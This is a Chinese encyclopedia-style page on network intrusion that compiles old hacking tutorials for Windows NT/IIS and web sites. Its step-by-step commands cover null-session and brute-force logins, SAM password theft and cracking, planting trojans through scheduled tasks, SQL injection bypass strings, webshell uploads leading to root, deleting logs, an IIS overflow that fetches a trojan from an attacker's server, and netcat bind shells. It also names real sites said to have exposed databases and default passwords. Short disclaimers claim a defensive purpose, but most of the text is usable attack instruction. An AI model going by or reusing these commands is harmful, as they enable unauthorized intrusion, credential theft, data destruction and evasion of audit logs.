创旗管理系统服务中心
创旗管理系统服务中心

入侵

目录

[显示全部]

定义编辑本段回目录

   入侵是指在非授权的情况下,试图存取信息、处理信息或破坏系统以使系统不可靠、不可用的故意行为。网络入侵(hacking)通常是指具有熟练地编写和调试计算机程序的技巧,并使用这些技巧来获得非法或未授权的网络或文件访问,入侵进入公司内部网的行为。

WIN2K入侵七武器编辑本段回目录

   文中为大家所讲解的内容是为了让更多的人了解黑客的攻击手段,以便更好地防范黑客,针对黑客手段对系统进行更安全的设置,读者不得将此用于非法用途。大致说来,黑客入侵Windows NT的原理和入侵Win95/98差不多, 因为NT同样是使用NetBIOS Over TCP/IP ( NBT )的技术, 而且应用范围比Win95/98 更广泛。以下是几种黑客入侵Windows NT的方法, 让我们也窥探一下黑客的“武器库”吧。

方法一、 使用空密码连线
现在假设目标电脑的IP地址是202.64.161.X (X为任选数字), 先使用nbtstat 指令查看对方NT的网
络数据:nbtstat -A 202.64.161.X
如果看到<20 的字样, 那么此NT系统可能将自己电脑数据共享出来。其实在NT安装后, 会将电脑上的驱动器都共享出来, 没错, 是自动共享出来的! 不过只是隐藏了, 所以你未必会看得见。而很多人在安装好NT后未做任何设置便即使用, 这正好给黑客一个入侵的大好机会。随后黑客就会使用Net View 指令看看这个

IP 地址:net view \202.64.161.X
正常来说会出现系统发生 System error 5 has occurred 的字样。这就是NT比Win95/98 安全的地方! 如果是Win95/98 , 只要使用net view 指令就可以看到对方电脑所有共享出来的资源, 如果是NT就一定要登录进入NT服务器才可以用net view 指令。但黑客并没有对NT服务器的帐户, 又怎样登录呢? 其实NT有一个很大的漏洞, 它有一个ipc$( Inter-Process Communication: 进程间通讯 ) , 其同样是隐藏共享, 作为服务器与服务器间的沟通, 只要连接到对方的IPC, 便有机会入侵了。他会先用null password ( 空密码, 即是没有密码! ) 来试试, 手法如下:

net use \202.64.161.Xipc$ “ ” /use:“ ”
以上的“ ” 是空密码的意思, 如果连接上会看见“指令执行成功”的字样。接着便再用

net view \202.64.161.X然后便可以看到对方所有共享出来的资源了

接着黑客会用net use 指令, 把对方共享出来的资源映射成自己的网络驱动器, 之后想怎样用就随心所欲了。如果对方没有把隐藏共享取消, 黑客可以用以下指令:
net use X: \ip地址c$那对方的C 盘便会变成自己的X 盘了, 不过这方法未必一定可行, 因为NT服务器安装了Services Pack 3 或以上版本, 用空密码连接IPC$ 的权限被限制, 不能够映射NT上的驱动器 , 这时便要使用下一个方法。

方法二、使用NAT工具
如果用空密码进入NT服务器没有收获, 黑客们也不会绝望。黑客可以尝试使用其他帐户的密码来进入。如何知道NT服务器的帐户? 那当然是猜啦! 其实NT的密码不是想像中困难, 而是比想像中更易, 而这些大多是人为的错误。

首先需要一个NAT的程序, NAT全名是( NetBIOS Auditing Tool ) , 可以自动连线到NT服务器, 并猜对方帐户的密码, 这是Internet上黑客入侵NT的必备“武器”。
Essential NetTools 是一个专门检查NT漏洞的NAT 套餐, 它的功能非常强劲, 先来看看它的几个主要功能。

1. NB扫描
NB扫描 可以一次性替你扫描 Internet 上电脑的IP, 如果你上网的速度够快, 不用一分钟便可以扫描 整个Class C 的IP , 之后它会列出那一段IP地址内所有电脑的NetBIOS数据, 作用和黑客用nbtstat指令一样, 不同的地方就是不用逐一测试, 节省不少时间。

2. NATShell
NATShell 是用暴力破解的方法尝试登录入NT服务器, 只要把目标的IP 地址输入NATShell 的视窗, 便可以开始了。可能你以为“强攻”会很难, 但根据经验, 有4成以上的NT都可以轻易攻入, 什么原因呢? 因为人懒之故。

3.LMHosts
用NB扫描到目标后, 可以选“Add all items to LMhosts ”项, 便会将对方的IP 及电脑名称自动加在电脑的lmhosts文档内, 以后你可以用“查找”→“电脑”, 找到对方的电脑, 非常方便。
好了! 决定了要检查的目标后, 在NATShell填上它的IP 地址, 等待一段时间, 便可以看看结果-- NATShell的报告。NATShell 会不断用不同的用户名 (userlist.txt) 及密码 (passlist.txt) 来登录进入NT服务器( 当然你可以自己再编辑这两个文件) 。如果成功连接, 便会有红色的warning 字句出现, 并且列出该NT系统 的用户名 和密码 。

例如找到NT的Administrator(管理员)的密码是admin 。便会尝试在DOS下打:
net use x: \IP 地址c$ /user:administrator admin
便成功地把此NT系统隐藏的C区映射成自己电脑的某个盘了!
如果在NATShell 的报告是所有的共享都有"CONNECTED with name: *SMBSERVER" 的字样, 即是说NT连密码都没有设定, 如果是密码, 还要打入:
net use x: \IP 地址c$ /user:administrator
便可以把NT的C 驱动器映射成自己的某个磁盘了。如果被黑客知道了管理员的帐户, 基本上黑客以后出入如走平地, 整台NT都会被黑客xx控。
NAT 批量扫描法:
因为Essential NetTools 每次只可以扫描一台NT的密码漏洞, 效率实在太低了。为了使入侵更有效率, 黑客可以使用NAT的批量扫描法。
在Essential NetTools 的目录下有一个nat.exe 的文件, 是可以直接在DOS 状态下执行, 方法是:
nat -o result.tst -u userlist.txt -p passlist.txt 202.64.161.1-202.64.161.254
那么nat 程序便会根据用户名称文文档( userlist.txt ) 和密码文档( passlist.txt ) 来登录进入202.64.161.1 到202.64.161.254 的主机范围, 并会将结果存在result.txt 上。


方法三、 检查NT的密码
用Essential NetTools 可以用不同的户名称及密码文档来登录进入NT服务器, 如果直接得到管理员的帐户, 就证明这台NT服务器的安全程度低得可怜!
如果只是得到一般的帐户的密码, 虽然权力不大, 但也不代表这部NT是安全。例如黑客可以用一般帐户的密码登录进入NT服务器, 然后用Copy 指令, 将NT的密码文档拷到自己的电脑中。
不过NT的密码文档(SAM , 文件位置在WinntSystem32config ) 的系统启动时是只读的, 不可以复制, 不过还有另一个文件, 就是在winntrepair 的目录中的sam._ 文档。
Sam._ 是什么文档? 通常在安装NT时都会制作系统恢复盘 , 遇到NT有问题时, 便可以用系统恢复盘 进入NT, 而sam._ 便是sam 密码文档的“副本”。只要将sam._ 拷到电脑上, 便可以用其他程序来慢慢破解密码了。在DOS 状态下执行复制:
copy \202.64.161.Xadmin$repairsam._ c:
便会把sam._ 文档拷到自己的C 盘内。如果目标电脑忽略了sam._ 的重要性, 没有设定好文件的权限, 便为黑客提供了大好机会了。
如何解开SAM 密码文档:
NT的系统密码是用单向散列( Hash ) 来处理过, 完全看不出源密码, 理论上要还原成源密码机会不大, 这些编码会放在SAM ( Security AccouNTManager ) 数据库内, 可以用一个专门破解NT密码的程序--- L0phtCrack 来破解。
它是Internet 上非常有名的检查NT密码工具, 它会用各种可能的密码, 反复模拟NT的编码过程, 并将编出来的密码与SAM 数据库的密码比对, 如果相同, 就会得出密码了, 黑客可以借此入侵NT的系统! 先将sam._ 用extract 指令解开, 在DOS 状态下打:
extract sam._ sam.txt
执行L0phtCrack , 在"File" "Import" "SAM file" 输入sam.txt ,在"Tools" "Start Crack" 便会开始解密。
如果NT的密码是一些数字或人名, 用L0phtCrack 不用十分钟便可以解开!有人曾用一台Pentium II 的电脑, 只用一日时间便完全解开管理员和其他帐户的密码。
但以上这些指令和工具都有限制的,就是只可以显示NT服务器的隐藏共享、已登录进入系统的用户名称,数据不够详细,以下黑客用的NTInfo扫描就可以进一步检查NT服务器的漏洞(也适用于Windows 2000)。


1. 用户数据一览无遗的NTInfo扫描
为了进一步了解目标电脑的安全性, 黑客需要使用一个超小型的工具NTInfo扫描 , 它只有69 KB , 但比Essential NetTools 更强劲! 只要执行它, NT服务器的隐藏共享 、用户帐户名称、域名都会一览无遗, 可以让黑客深入了解该台NT服务器的漏洞! 只要在DOS 状态下下执行:
ntis -n IP地址
之后NTInfo扫描便会列出一个详细的报告( HTML 文档) , 包括所有共享的资源( 包括了隐藏的) 、共享的名称、所有NT服务器内的帐户数据, 例如用户帐户名称、是否可以游客身份登录、多久没有更改密码等。而最强悍的地方是NTInfo扫描 ,它会自动检查NT服务器内帐户密码是否足够安全, 例如检查用户名称和密码是否一致、或者有没有使用密码等。


2. NTResource Kit 帮助入侵
如果大家的NT服务器安装了NTResource Kit 4.0 , 你会发觉这个工具非常有用。NTResource Kit 可以算是NT服务器的辅助工具, 可以帮助网络管理人员管理NT和遥控处理NT的工作。不过内里有几个程序常会被黑客利用来入侵NT的电脑。
     (1) . 共享资源的Net Watch
如果有黑客使用上述介绍的方法来进入NT服务器, 便有机会为所欲为了!
只要使用Resource Kit 的"Net Watch" 便可以连接对方的电脑。在"Connection" / "Add Computer" 输入电脑的IP 地址, 隔一会便会出现对方电脑共享出来的资源。"Manage Shares" 会显示对方的共用目录, 只要按" 添加共享资源" 便可将对方电脑整个硬盘都共享出来, 并且将权限设为"Everyone", 这便使得日后的攻击更方便了。
    (2) . 监视程序的Process Viewer
NTResource Kit 提供了Process Viewer , 它可以检视Local 和Remote 电脑直接在执行的程序。Process Viewer 可以监视NT服务器的执行情况, 如内存和各种程序的使用情况。只要在"Computer" 输入对方电脑的IP 地址, 隔一会便会显示对方NT正在执行的程序, 它可以杀死本地电脑的程序。
黑客如果要杀死远程电脑的程序也是有办法的, 只要使用一个名叫Pskiller 的小程序就可以轻易做到了! 先用Process Viewer 连接NT电脑, 知道这台电脑正在运行什么程序, 之后便可以用Pskiller 来杀死。用法很简单, 在DOS 状态下输入:
pskill \ 电脑名称或IP地址-u roland -p xyz
-u roland : 是用户名称/
-p XYZ:进程中的电脑或ID
    (3). 定时控制的netsve
netsvc 是一个小小的程序, 可以用来启动NT的服务, 如schedule(进度表)等, 通常是黑客用来遥控执行NT服务器的某个程序, 先将netsvc 拷到对方的NT内:
copy ntsvc.exe \IP 地址admin$system32
然后再输入:
netsvc \IP 地址schedule /start
这便可以启动该电脑的schedule 服务。
然后便把一个木马或病毒程序( 假设是killer.exe ) 拷到对方电脑:
copy filler.exe \IP 地址admin$system32
之后便可以用at 指令来设定schedule 的执行时间:
at \IP 地址12:30 killer.exe
这样就可以在12:30 时自动执行killer.exe
如果遇到一些“辣手”的黑客, 只要复合一个含有format 指令的简单批处理文件到NT服务器上, 校准时间, 便可以将对方的NT清洗得一干二净。


   (4). 关闭NT的shutdown :
shutdown : 关了对方的NT服务器:
Shutdown \IP 地址t:20
20秒后将NT自动关闭, 如果对方是大型网站可就惨了! 

入侵之简单通俗的讲解编辑本段回目录

问:什么常见命令啊,什么工具啊,如何入侵,我还不会啊,能简单通俗的讲解一下吗?

答:一般的初步入侵可以分为三步:
1,扫描目标主机并分析扫描信息。 比如 探测开放的端口,获得服务软件及版本, 探测漏洞等等
2,利用漏洞。探测并获取帐号或密码系统
3,获得权限,进行操作。
不要太专业,太深入,太冗长,仅仅举个两个实际例子,不涉及任何高深知识,从工具角度来讲,但从中可以看出入侵的一般步骤:
一,入侵单机---普通攻击 4个工具: 1,shed.exe 2,流光2000 3,cmd.exe 4,冰河8.4
操作系统:winnt系统。
“shed.exe”:其实就是用来网上查共享资源的,速度快,可以查到很多服务断的共享文件,不过在这里面有些ip在浏览器中无法访问,这是因为其中也包含了个人上网的ip.
“流光”:一些作网站和网吧的服务器一些目录都是共享的,有些是可以访问,但是不能删除,因为你所访问的都是以匿名访问的,权限不够!有些需要密码。遇到密码怎办?用流光! 用流光的ipc探测,建立一个空对话,查到用户列表,然后先简单探测,此时有些网管懒惰,把administrator设置的过于简单,便可以抓到肉鸡了。
使用冰河控制一台服务器速度很快,(因为服务器那边带宽很大)几分钟就可以查到对方主机的主页所在位置。但是如何上传并且控制他呢? 执行cmd.exe 使用net命令具体操作如下:
第一步:net use \ipipc$ “password” /user:”user” 说明:以一个超级用户名与你想黑的网站建立联接,当然超级用户必须是该网站admin里的。这里的”ip”就是主机了,“password”就是超级用户的密码,“user”就是超级用户。比如:net use \210.*.*.*ipc$ “juntuan” /user:"juntuan"
第二步:copy g-server.exe \ipadmin$system32 说明:g-server.exe就是冰河的远程服务器端。意义:将此文件拷贝到对方的主机winnt里的system32目录里。最好用最新的木马!哈哈,荷马以及教主还有很多人他们到处卖马呢,晕死......
第三步:net time \ip 察看对方的服务器时间。由于有时差,应该是一个小时吧!所以必须要以对方的服务器时间为准。
第四步:at \ip time g-server.exe 这里的time就是对方的主机时间。作用:在规定时间执行该程序。比如 at \210.*.*.* 19:55 g-server.exe 第五步:冰河就可以控制该电脑了。

二,入侵网站----SQL注入攻击
工具:榕哥的SQL注入攻击工具包,在榕哥的站点http://www.netxeyes.com/main.html可以下载。 下载来的这个工具包中总有两个小程序:“wed.exe”和“wis.exe”,其中“wis.exe”是用来扫描某个站点中是否存在SQL注入漏洞的;“wed.exe”则是用来破解SQL注入用户名密码的。两个工具的使用都非常简单,结合起来,就可以完成从寻找注入点到注入攻击完成的整个过程。
1、寻找SQL注入点
  “wis.exe”使用的格式如下:“wis.exe 网址”,:首先打开命令提示窗口,比如输入如下命令:“wis.exe http://www.juntuan.cn/”。在输入网址时,前面的“http://”和最后面的“/”是必不可少的,否则将会提示无法进行扫描。 输入完毕后回车,即可开始进行扫描了。很快得到了扫描结果,可以看到某些网站中存在着很多SQL注入漏洞,我们随便挑其中一个来做试验。现在来对它进行SQL注入,破解出管理员的帐号来吧!
2、SQL注入破解管理员帐号
  现在进入命令窗口中,使用刚才下载的工具包中的“wed.exe”程序,命令使用格式为:“wed.exe 网址”输入如下命令:“wed.exe 页面地址”。回车后可看到命令运行情况。:这次输入网址时,最后面千万不要加上那个“/”,但前面的“http://”头也还是必不可少的。
  可以看到程序自动打开了工具包中的几个文件,“C:wedwedTableName.dic”、“C:wedwedUserField.dic”和“C:wedwedPassField.dic”,这几个文件分别是用来破解用户数据库中的字表名、用户名和用户密码所需的字典文件。当然我们也可以用其它的工具来生成字典文件,不过想想小榕哥以前出的“黑客字典”那么的强大,还用得着去多此一举吗?
  在破解过程中还可以看到“SQL Injection Detected.”的字符串字样,表示程序还会对需要注入破解的网站进行一次检测,看看是否存在SQL注入漏洞,成功后才开始猜测用户名。
  开始等待,很快就获得了数据库表名,然后得到用户表名和字长;再检测到密码表名和字长。然后“wed.exe”程序进行用户名和密码的破解。很快的,就得到了用户名和密码了。
3、搜索隐藏的管理登录页面
  拿到了管理员的帐号,现在看来我们只有找到管理员登录管理的入口才行了。一般在网页上找遍了也没有看到什么管理员的入口链接,可以使用“wis.exe”程序,这个程序除了可以扫描出网站中存在的所有SQL注入点外,还可以找到隐藏的管理员登录页面。
 管理员登录页面只可能隐藏在整个网站的某个路径下。于是输入“wis.exe http://www.juntuan.cn/ /a”,对整个网站进行扫描。注意扫描语句中网址的格式。程序开始对网站中的登录页面进行扫描,在扫描过程中,找到的隐藏登录页面会在屏幕上以红色进行显示。很快就查找完了,在最后以列表显示在命令窗口中。
  在浏览器中输入网址,出现了本来隐藏着的管理员登录页面。输入用户名和密码,就进入到后台管理系统。

入侵的14种可利用方法编辑本段回目录

1.上传漏洞[不多讲]
  pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
      有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

2.注入漏洞[不多讲]
  pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:
     http://注入网址;update admin set password='新MD5密码' where password='旧MD5密码'--      [admin为表名.]

3.旁注,也就是跨站.
 我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了
 

4.暴库:把二级目录中间的/换成%5c
  EY:http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=职责范围&BigClassType=1
  如果你能看到:'E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否  连接到文件存放的服务器。
  这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.
 
5.'or'='or'这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
  'or''='  " or "a"="a     ') or ('a'='a     ") or ("a"="a    or 1=1--   ' or 'a'='a
6.社会工程学。这个我们都知道吧。就是猜解。
 EY:http://www.neu.edu.cn/waishi/admin
        admin   waishi
7.写入ASP格式数据库。就是一句话木马[ ],常用在留言本.
  EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话木马
  
8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.
  EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
  这个站用的是:杰出校友录,源码我下过了,
  默认数据库/webshell路径:databaseliangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin
    
9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:网站猎手  挖掘鸡
EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
10.查看目录法:人一些网站可以断开目录,可以方问目录。
EY:http://www.ujs168.com/shop/admin/
    http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
    这样我们可以找到数据库,下载不用我教吧
11.工具溢出:.asp?NewsID=   /2j.asp?id=18   .asp?id=[这种方法可以取得大量的WEBSHELL]
          
12.搜索引擎利用:
 
(1).inurl:flasher_list.asp   默认数据库:database/flash.mdb   后台/manager/
(2).找网站的管理后台地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理  
site:xxxx.cominurl:login
(3).查找access的数据库,mssql、mysql的连接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
我主不做了。。自已做做吧。。
13.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了

14.利用常见的漏洞:如动网BBS
 EY:http://js1011.com/bbs/index.asp
 可以先用:dvbbs权限提升工具,使自已成为前台管理员。
 THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包
 这个我就不做了,网上教程多的是,自已下个看看。
 工具:dvbbs权限提升工具   动网固顶贴工具
15.还有一些老漏洞。如IIS3,4的查看源码,5的DELETE
   CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。

入侵WEB主机的全过程编辑本段回目录

本文描述了如何通过WEB入侵获得freebsd 4.0的root权限。文章主要以教育为目的,希望各位
观者不要使用本文中的一些方法及程序,危害网络的安全。 很偶然的一个机会,看到了一个网站,页面清新,很舒服的感觉。网站是用JSP开发的,由于
个人爱好,所以我决定看看系统的安全性。 telnet www.target.com 8080 GET /CHINANSL HTTP/1.1 [Enter] [Enter] 返回的结果如下: HTTP/1.0 404 Not Found Date: Sun, 08 Jul 2001 07:49:13 GMT Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2 .2.12 i386; java.vendor=Blackdown Java-Linux Team) Content-Language: en Content-Type: text/html Status: 404 Error: 404 Location: /CHINANSLFile Not Found/CHINANSL
我获得了运行的WEBServer的名称“Tomcat 3.1”。我记得我曾经发现过这个版本的漏洞
并且post到bugtrap上去过。大概是:通过“..”技术可以退出WEB目录,于是: http://target:8080/../../../../%00.jsp (不行) http://target:8080/file/index.jsp (不行) http://target:8080/index.JSP (不行) http://target:8080/index.jsp%81 (不行) http://target:8080/index.js%70 (不行) http://target:8080/index.jsp%2581 (不行) http://target:8080/WEB-INF/ (不行)
嗯,在试试吧!Tomcat
3.1自带了一个管理工具,可以查看WEB下的目录及文件,并且可以添加context.试一下:
http://target:8080/admin/
管理员果然没有删除或禁止访问这个目录:-(失误!)接着我点“VIEW ALL CONTEXT”
按钮,列出了WEB目录下的一些文件和目录的名称,我开始仔细的看了起来一小会儿,发现了
一个上传文件的组件,嘿嘿,写一个jsp文件弄上去看看。 几口咖啡的时间,我写了这么一个
东东出来:  
通过上传的组件将这个jsp上传到对方的WEB目录里,然后:
http://target:8080/upload/test.jsp?file=/etc/passwd
嘿嘿,密码出来啦。我只看了“/etc/passwd”,并没有看“/etc/shadow”,因为当时考虑
webserver一般使用nobody的身份启动的,看了也白看。(失误) 接下来的过程是无聊的猜
测密码,没有成功。算了,那我只有将就点,反正现在我相当于有了一个shell了嘛,猜不出
密码上去,那就全当IE是我的SHELL环境吧! 再写:  
然后把这个jsp又通过upload上传了上去,嘿嘿,我现在有个SHELL了。
http://target:8080/upload/cmd.jsp?cmd=ls+-la+/ (我这里就不列出来了)
怎么获得root呢?经过一番搜索我发现了系统安装了mysql并且我从jsp的源代码中得到了mys
ql的密码:)看看是什么权限运行的mysql:
http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld
显示: root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72 /usr/local/data/mysql
嘿嘿,有办法了,系统是以root身份运行的mysql,同时我知道了mysql的密码,那我现在我可
以写一个shell程序,让它create一个表,然后将我的数据放到表中,然后再使用"select ...
into outfile;"的办法在系统上创建一个文件,让用户在执行su的时候,运行我的程序。
还记得apache.org有一次被入侵吗?hacker就采用的这种办法)。 然后,我再上传bindshell
之类的程序,运行、获得nobody的权限,然后......再使用suroot时帮忙创建的setuid shell
让自己成为root. 嘿嘿,真是好办法,我都为我的想法感到得意...... 接下去的事情,差点没让我吐血:
我敲了一个:http://target:8080/upload/cmd.jsp?cmd=id 显示: uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)
kao,我的这个WEB SHELL本来就是ROOT,真是服了那个管理员,也服了自己。竟然折腾了这么
半天,哎! http://target:8080/upload/cmd.jsp?cmd=ps+aux 果然是root身份运行的(不列出来了) 剩下来的事情:
1、删除我的telnet记录。 2
、删除http的日志。 至于清除日志嘛,我使用的办法是:cat xxx |grep -V "IP" >>temp然后在把temp覆盖那些
被我修改过的日志文件。我没有更换他的页面,因为我本身也就不是什么黑客啦更不是红客只
是个网络安全爱好者而已。所以,发封邮件告诉system admin吧!

入侵NTserver典型途径编辑本段回目录

简介

  1. 如果你有NT/IIS服务器的任何一个帐号,哪怕是guest帐号,都可以获得Administrator权限;
  2. 用netcat和iishack可以获得Administrator;
  3. iusr_计算机名这个帐号有ftp上传、web执行等权限;
  4. 在web server上执行程序是入侵NT的关键;
  5. 要在web server上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去。

  在本文中,目标机器的名称是ntsvr2,目标机器的域名是www.xxx.com,目标机器上有scripts和cgi-bin目录,scripts目录下有uploadn.asp等asp程序,可能有guest帐号,肯定有iusr_ntsvr2这个帐号。

  第一个方法:用iusr_ntsvr2或者guest这两个帐号(这里假设我们已经破解了这个帐号的密码),在浏览器输入:

 http://www.xxx.com/scripts/uploadn.asp

  guest和iusr_ntsvr2这两个帐号都可以进这个asp页面。

  在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录,然后输入:

 http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2

  大约十多秒后屏幕显示:

  CGI Error

  这时有90%的可能是你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。

  下面可以add user:

 http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32net.exe%20user%20china%20news%20/add

  这样就创建了一个叫china用户,密码是news,然后:

 http://www.xxx.com/scripts/getadmin.exe?china

  第二个方法:用匿名ftp

  如果允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):

  c:> ftp www.xxx.com
  Connected to www.xxx.com
  220 ntsvr2 Microsoft FTP Service (Version 3.0).

  ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSR_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来获取Administrator的权限。

  User (www.xxx.com:(none)):anonymous
  331 Anonymous access allowed, send identity (e-mail name) as password.
  Password: 输入guest@ 或者guest

  对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码,那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain guest组,在这种情况下我们就可以进NT server的ftp了。

  进去以后,看看目录列表,试试cd /scripts或cgi-bin等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握了。

  把winnt下的cmd.exe copy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin,然后输入:

 http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2

  大约十多秒后屏幕显示:

  CGI Error

  这时有90%的可能是你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。

  下面可以add user:

 http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32net.exe%20user%20china%20news%20/add

  这样就创建了一个叫china用户,密码是news,然后:

 http://www.xxx.com/cgi-bin/getadmin.exe?china

  或者

 http://www.xxx.com/scripts/tools/getadmin.exe?china

  你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改。如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录下。
 
  第三个方法:用netcat和iishack

  如果你熟悉使用Netcat这个工具,你就知道netcat可以利用NT的弱点在其上绑定端口,下面用的eEye工具已经介绍过,如果你熟悉Netcat,成功的可能性会更大。
 
  IIS的ISAPI的毛病(*.HTR):我们再来看看eEye最近这两天发现的一个关于NT/IIS的问题和工具。在IIS的/Inetsrv目录下,有个DLL文件叫ism.dll,这个模块在web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现。IIShack.asm,利用这个毛病,eEye写了两个程序: iishack.exe、ncx99.exe,为达目的你必须自己有一个web server,把ncx99.exe和netbus木马传到这个web server的目录下,比如你的web server是www.mysvr.com,而对方的IIS server是www.xxx.com,则:

  iishack www.xxx.com 80 www.mysvr.com/ncx99.exe (注意:不要加“http://”字符!)

  上述命令输入后这时你应该可以看到:

  ------(IIS 4.0 remote buffer overflow exploit)-----------------
  (c) dark spyrit -- barns@eeye.com.
 http://www.eEye.com
  [usage: iishack 〈host〉 〈port〉 〈url〉]
  eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
  do not include http://' before hosts!
  ---------------------------------------------------------------
  Data sent!

  然后:再把Netbus等特洛伊木马传到对方机器上去:

  iishack www.example.com 80 www.myserver.com/netbus.exe

  ncx99.exe实际上是有名的Netcat的变种,它把对方server的cmd.exe绑定到Telnet服务,ncx.exe这是较早的版本,是把端口绑到80的,由于80端口跑web服务,端口已经被使用,所以可能不一定有效。然后,用Telnet到对方的99或80端口:

  Telnet www.xxx.com 99

  结果是这样:

  Microsoft(R) Windows NT(TM)
  (C) Copyright 1985-1996 Microsoft Corp.
  C:>[You have full access to the system, happy browsing :)]
  C:>[Add a scheduled task to restart inetinfo in X minutes]
  C:>[Add a scheduled task to delete ncx.exe in X-1 minutes]
  C:>[Clean up any trace or logs we might have left behind.]

  这样,你就完全控制了其硬盘上的文件!注意,如果你type exit退出,对方server上的这个进程也会退出。

  参考资料: eeye.zip
  补救方法:在IIS的www service属性中将主目录的应用程序设置的*.htr的映射删除。

  第四个方法:如果你具有一个目录的上传权限,且这个目录具有执行的许可,那么恭喜你,你可以Telnet到这台server了!

  下面是具体步骤:

  假设你的目录是www.xxx.com/frankie,那么,把cmd.exe(位于C:winntsystem32cmd.exe)和Netcat里面包含的nc.exe传到这个目录上去,然后在浏览器端输入:

 http://www.xxx.com/frankie/cmd.exe?/c%20nc.exe%20-l%20-p%2023%20-t%20-e%20cmd.exe

  这时候你的浏览器将停止不动,实际上server上的Telnet的服务已经产生了。

  这时,用Telnet连接www.xxx.com的23端口,你发现会不用密码、不用登陆,对方“C:”提示符已经出现在你的眼前!更妙的是,这个Telnet server是一个一次性的服务,当客户端一退出,该服务也将终止。

  Netcat不同于一般的特洛伊木马,它可以构建任何的TCP连接服务,在浏览器端输入上述的字符串,等价于在NT的dos方式下输入“nc -l -p 23 -t -e cmd.exe”,这将把cmd.exe绑定到23端口上。

 

附件列表

文章内容仅供参考,如果您需要解决具体问题建议您提交有问必答。 0

标签: 入侵

收藏到: Favorites  

同义词: 暂无同义词

文章信息
客服导航
如果您在使用我们的产品中遇到问题,建议您首先在“常见问题”中查询解决方法;
如果没有找到该问题的解决方法,您可以在“问题搜索”中进行搜索;
如果搜索后没有找到满意答案,您可以“在线提问”,我们会在1个工作日内给您答复。